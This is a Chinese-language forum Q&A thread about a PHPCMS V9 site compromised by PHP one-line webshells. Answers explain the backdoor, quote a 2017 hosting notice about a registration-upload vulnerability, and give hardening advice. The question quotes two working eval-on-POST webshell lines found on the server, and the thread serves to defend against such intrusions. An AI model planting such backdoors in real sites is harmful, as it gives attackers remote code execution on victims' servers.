網站程式遭木馬【<?php eval($_POST[1]);?> ok】入侵，請求幫助探尋機理？

Question

網站近來頻繁遭遇駭客攻擊，請求PHP大神給予協助，釐清思路，以助早日找到漏洞，解決煩憂！

現將事件經過陳述如下：

1、網站採用PHPCMS_V9_5.20預設版本搭建。

2、所有檔案起先均以全開放權限存於伺服器根目錄。

3、後來網站被黑，入口檔案api.php和index.php被改寫。

4、植入病毒檔案為：「一句話木馬」。內容如下：

<?php @eval($_POST['dcs-19']);?>
<?php
##5、發現問題，刪除以後，將此類檔案的權限鎖死，以為就能解決問題。但隔幾日，發現網站的快照被劫持，遂又查殺了一次木馬，結果顯示，木馬文件所在位置為伺服器根目錄下uploadfile20170527資料夾中，此文件為後台上傳附件或更新文章時按照日期自動生成。但是5月27日這天並沒有更新文章，卻出現了，請求大神給予協助，排查網站問題根源所在。

木馬內容為：

#<?php eval($_POST[1]);?>

ok

#另附：在網路上查詢了相關內容，大多數說是網站程式漏洞所致的sql注入攻擊，提示修復漏洞，但是怎麼修復啊？ PHP版本線上升級會有用嗎？

【

本人小白非技術出生，很多東西都不懂，說的不明白的地方，問答中，我再按照你們的指示補充！ 】

Answer 1

這句話程式碼原理很簡單，POST指的是客戶端傳送過去的數據，eval表示將這些資料當成程式碼執行。
對駭客來說就是只需要在你網頁上的對話方塊輸入程式碼，提交以後就會實際執行。

這只是表徵，也就是最後留下的後門，但是黑客如何進來留後門的，那可能性就太多了，說不定上傳功能有漏洞，ftp密碼被破，管理員權限被獲取，等等。最後留下這句木馬只是下次使用方便而已。

最起碼的需要做的，是整套程式碼下載下來，遍歷一遍所有程式碼，查到所有eval 相關的地方，如非本身程式必須，全部處理掉，不然你這邊刪一個，人家在別的地方重新上傳一個，沒完沒了。第二就是堵住系統管理漏洞，伺服器各項元件能更新的就更新，所有密碼全都改掉使用隨機強密碼，然後在伺服器裝個防毒軟體，我記得以前用過 Linux 伺服器一個開源的。 。忘了名字你搜尋下就好。

最後，實在不行就交給專業的人處理，看投資值不值得了，我記得外國有網站是提供木馬查殺，變動監控服務的，好像一兩百美金一年，挺貴。國內不知道有沒有相同的服務。

Answer 2

關於PHPCMS漏洞的通知
尊敬的使用者：
您好！
今年四月PHPCMS程式曝光的最新漏洞，可以透過修改會員註冊參數向網站注入PHP木馬檔案。透過我司測試發現，註冊會員時，PHPCMS會將註冊資訊加密，然後再傳遞到伺服器上進行會員註冊操作，由於加密方式暫時無法破解，因此我司無法透過匹配對應的關鍵字來攔截駭客入侵；
目前解決方案有三種：

1. 升級到最新的PHPCMS程式；

2. 關閉網站上的會員註冊功能；

3. 取消uploadfile目錄的執行權限（此方法可以避免木馬執行，但無法避免木馬文件上傳）；
   執行上述任一方案後，請徹底檢查uploadfile目錄及子目錄，是否含有PHP文件，此目錄為上傳圖片的圖片保存目錄，如果發現存在PHP文件，則一定為木馬文件！請及時刪除！

景安網
2017.6.19

Answer 3

換伺服器密碼，換SSH預設端口，能換伺服器換伺服器。換PHPCMS，5,6年前都停止更新了。肯定漏洞不少。

Answer 4

權限問題，你的上傳目錄開了可執行權限。
解決問題的方法麼，排除PHPCMS的漏洞之外，你需要將所以外部檔案（不是你自己寫的或框架的程式碼）目錄的可執行權限去掉。

chmod -R 644 upload

Answer 5

樓上兩位回覆：你的上傳目錄開了可執行權限、取消uploadfile目錄的執行權限
這是什麼意思？都取消目錄執行權限了，目錄都打不開，自己要上傳圖片都上傳不了，那還行？